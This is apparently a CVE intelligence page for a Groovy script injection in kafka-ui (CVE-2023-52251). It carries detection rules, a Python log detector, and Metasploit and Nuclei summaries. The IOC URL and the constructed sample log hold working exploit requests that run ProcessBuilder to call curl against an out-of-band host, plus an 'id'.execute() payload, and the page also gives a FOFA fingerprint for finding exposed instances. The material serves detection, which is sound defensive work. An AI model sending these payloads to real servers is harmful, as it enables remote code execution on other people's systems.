CVE-2023-52251
Published 2024-01-25
Priority: P1 · 89 · High · 8.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 85.02% (99.7th percentile)
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| provectus | ui | 0.4.0 – 0.7.1 (inclusive) | 0.7.2 |
Detection & IOCs (extracted from sources)
URL: /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING
Other: filterQueryType=GROOVY_SCRIPT
Other: fofa-query: icon_hash="-1477045616"
Snort/Suricata (ET) rule:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/api/clusters/"; startswith; content:"/topics/"; within:50; content:"/messages?q|3d 22|"; within:50; content:"|28 29 26|filterQueryType|3d|GROOVY_SCRIPT"; distance:0; fast_pattern; reference:url,attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251; reference:cve,2023-52251; classtype:attempted-admin; sid:2050499; rev:2; metadata:affected_product Apache_Kafka, attack_target Web_Server, created_at 2024_01_25, cve CVE_2023_52251, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_08, reviewed_at 2024_10_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- Exploit requests are HTTP GETs to /api/clusters/<name>/topics/<topic>/messages with the query parameter `q` carrying a Groovy script (e.g. new ProcessBuilder(...).start()) and `filterQueryType=GROOVY_SCRIPT`. The latter is what selects the Groovy interpreter rather than a plain string filter, so it is the more stable anchor across payload variants.
- The ET rule (SID 2050499, written in Suricata sticky-buffer syntax: http.uri; startswith) keys on the URI: it must start with /api/clusters/, be followed within 50 bytes by /topics/, then within 50 bytes by /messages?q= and an opening double quote (hex 3d 22 is `="`), and then, anywhere later (distance:0), the byte sequence `()&` (hex 28 29 26) immediately followed by filterQueryType=GROOVY_SCRIPT. Because of the `q="` anchor, the rule only matches scripts that begin with a quoted string literal, such as "cmd".execute(); the new ProcessBuilder(...) form in the IOC URL above begins with `q=new` and does not satisfy that content match, so pair the rule with a broader check on filterQueryType=GROOVY_SCRIPT.
- Successful exploitation produces the string 'Assigning partitions' in the HTTP response body; this can be used as a confirmation matcher.
- Attackers first enumerate /api/clusters to discover the cluster name, then /api/clusters/<name>/topics to discover a topic name, before launching the injection; monitor for this reconnaissance sequence.
- Kafka UI instances can be fingerprinted via FOFA using the icon hash -1477045616 to identify exposed targets.
- The NVD description uses the cluster name 'local' in the path, but exploits enumerate the real cluster name from /api/clusters; detections hard-coded to 'local' will miss attacks against differently-named clusters.
- The vulnerability affects Kafka UI versions 0.4.0 through 0.7.1 inclusive; version 0.7.2 and later are not affected.
- The ET rule (SID 2050499) requires TLS decryption (deployment SSLDecrypt) to fire on HTTPS-protected Kafka UI instances.
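The detection points above, as an added worked example (not code from this page, from Emerging Threats or from the kafka-ui project): a log-side detector that flags GROOVY_SCRIPT filter requests, separates those carrying command-execution markers from plain Groovy filters, tracks the enumerate-clusters, enumerate-topics, inject sequence per source IP, and approximates the SID 2050499 URI content chain so the two can be compared on the same requests. Assumptions not on the page: the log is in Combined Log Format, the marker substrings (ProcessBuilder, .execute(, Runtime.getRuntime) are an illustrative and non-exhaustive list, the sample log lines and IPs are constructed, and the ET emulation assumes the rule's http.uri buffer sees a percent-decoded URI (verify against your sensor's libhtp settings).

```python
"""
Added example (not from this page, Emerging Threats or the kafka-ui project):
log-side detection of CVE-2023-52251 exploit attempts and the
cluster/topic enumeration that precedes them, plus an approximation of the
ET SID 2050499 URI content chain for comparison on the same requests.

Assumptions not on the page: Combined Log Format input; an illustrative,
non-exhaustive list of Groovy payload markers; the ET rule is assumed to see
a percent-decoded URI in its http.uri buffer.
"""
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Exploit path from the advisory (the cluster name is NOT always 'local').
MESSAGES_RE = re.compile(r"^/api/clusters/([^/]+)/topics/([^/]+)/messages$")
# Reconnaissance endpoints: cluster enumeration, then topic enumeration.
CLUSTERS_RE = re.compile(r"^/api/clusters/?$")
TOPICS_RE = re.compile(r"^/api/clusters/([^/]+)/topics/?$")
# Illustrative substrings that mark an OS-command-capable Groovy payload (assumed list).
GROOVY_MARKERS = ("ProcessBuilder", ".execute(", "Runtime.getRuntime")
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify_request(method: str, target: str) -> Optional[dict]:
    """Classify one request target; returns a finding dict or None."""
    parts = urlsplit(target)
    path = parts.path
    if CLUSTERS_RE.match(path):
        return {"kind": "recon_clusters"}
    t = TOPICS_RE.match(path)
    if t:
        return {"kind": "recon_topics", "cluster": t.group(1)}
    m = MESSAGES_RE.match(path)
    if m is None or method.upper() != "GET":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    # filterQueryType=GROOVY_SCRIPT selects the Groovy interpreter; without it
    # the q parameter is treated as a plain string filter.
    if qs.get("filterQueryType", [""])[0] != "GROOVY_SCRIPT":
        return None
    q = qs.get("q", [""])[0]  # parse_qs percent-decodes and turns '+' into spaces
    kind = "exploit" if any(mk in q for mk in GROOVY_MARKERS) else "groovy_filter"
    return {"kind": kind, "cluster": m.group(1), "topic": m.group(2), "q": q}


def et_2050499_matches(uri: str) -> bool:
    """Approximate the URI content chain of ET SID 2050499 on a decoded URI.

    Chain: "/api/clusters/" at offset 0 (startswith); "/topics/" ending within
    50 bytes; '/messages?q="' (|3d 22| is =") ending within 50 bytes; then
    '()&filterQueryType=GROOVY_SCRIPT' (|28 29 26|) anywhere later (distance:0).
    """
    head = "/api/clusters/"
    if not uri.startswith(head):
        return False
    pos = len(head)
    for needle in ("/topics/", '/messages?q="'):
        i = uri.find(needle, pos)
        if i < 0 or i + len(needle) > pos + 50:  # within:50 -> must END within 50 bytes
            return False
        pos = i + len(needle)
    return uri.find("()&filterQueryType=GROOVY_SCRIPT", pos) >= 0


def analyze_log(text: str) -> dict:
    """Per-source-IP summary of recon steps, exploit attempts, Groovy filters and ET hits."""
    report = defaultdict(lambda: {"recon": [], "exploit": [], "groovy_filter": [], "et_2050499": 0})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, _status = m.groups()
        finding = classify_request(method, target)
        et_hit = method.upper() == "GET" and et_2050499_matches(unquote(target))
        if finding is None and not et_hit:
            continue
        entry = report[ip]
        if finding is not None:
            if finding["kind"].startswith("recon_"):
                entry["recon"].append(finding["kind"])
            else:
                entry[finding["kind"]].append(finding)
        entry["et_2050499"] += int(et_hit)
    return dict(report)


def recon_chain_complete(entry: dict) -> bool:
    """True when one source enumerated clusters and topics and then attempted exploitation."""
    return ("recon_clusters" in entry["recon"] and "recon_topics" in entry["recon"]
            and bool(entry["exploit"]))


# Constructed sample log (not real traffic): an enumerate-then-exploit chain using
# the IOC's ProcessBuilder payload, a quoted-string payload of the form the ET rule
# anchors on, a legitimate-looking Groovy filter, and a plain string filter.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jan/2024:10:00:01 +0000] "GET /api/clusters HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.7 - - [25/Jan/2024:10:00:02 +0000] "GET /api/clusters/prod-eu/topics HTTP/1.1" 200 9120 "-" "python-requests/2.31"
203.0.113.7 - - [25/Jan/2024:10:00:03 +0000] "GET /api/clusters/prod-eu/topics/orders/messages?q=new+ProcessBuilder%28%22curl%22%2C%22oob.example%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1" 200 5571 "-" "python-requests/2.31"
198.51.100.9 - - [25/Jan/2024:10:05:00 +0000] "GET /api/clusters/prod-eu/topics/orders/messages?q=%22id%22.execute%28%29&filterQueryType=GROOVY_SCRIPT&limit=100 HTTP/1.1" 200 3300 "-" "curl/8.4.0"
10.0.0.5 - - [25/Jan/2024:10:07:00 +0000] "GET /api/clusters/prod-eu/topics/orders/messages?q=value.amount+%3E+100&filterQueryType=GROOVY_SCRIPT&limit=100 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Jan/2024:10:08:00 +0000] "GET /api/clusters/prod-eu/topics/orders/messages?q=orderId&filterQueryType=STRING_CONTAINS&limit=100 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, entry in analyze_log(SAMPLE_LOG).items():
        print(ip, "recon=%s exploit=%d groovy_filter=%d et_2050499=%d chain=%s" % (
            entry["recon"], len(entry["exploit"]), len(entry["groovy_filter"]),
            entry["et_2050499"], recon_chain_complete(entry)))
```

Running it over the constructed log shows the gap the rule's `q="` anchor leaves: the 203.0.113.7 chain is caught by the filterQueryType/marker check and by the recon sequence but scores zero ET hits, while the `"id".execute()` request from 198.51.100.9 is caught by both. The marker-less Groovy filter from 10.0.0.5 is reported separately at lower confidence; since any Groovy filter is evaluated by the server, treat such requests from outside your administrative network as worth a look.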
CVSS provenance
NVD (v3.1): 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 8.8 HIGH
Suricata
ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)
suricata · 2024-01-25 · CVSS 8.8
Rule: SID 2050499, reproduced in full under Detection & IOCs above.
Metasploit
Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
metasploit
A command injection vulnerability exists in Kafka UI between `v0.4.0` and `v0.7.1` allowing an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter at the `topic` section.
Note that the module title describes the issue as unauthenticated, whereas the NVD vector scores it PR:L and the Nuclei template below speaks of authenticated attackers. Kafka UI ships with authentication disabled by default, so whether any credential is needed depends on how the instance was deployed.
Nuclei
Kafka UI 0.7.1 Command Injection
nuclei · CVSS 8.8
Template:
id: CVE-2023-52251

info:
  name: Kafka UI 0.7.1 Command Injection
  author: yhy0,iamnoooob
  severity: high
  description: |
    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  impact: |
    Authenticated attackers can inject and execute arbitrary commands via Groovy script injection in the filterQueryType parameter.
  remediation: |
    Upgrade Kafka UI to version 0.7.2 or later.
  reference:
    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command
No writeups or analysis indexed.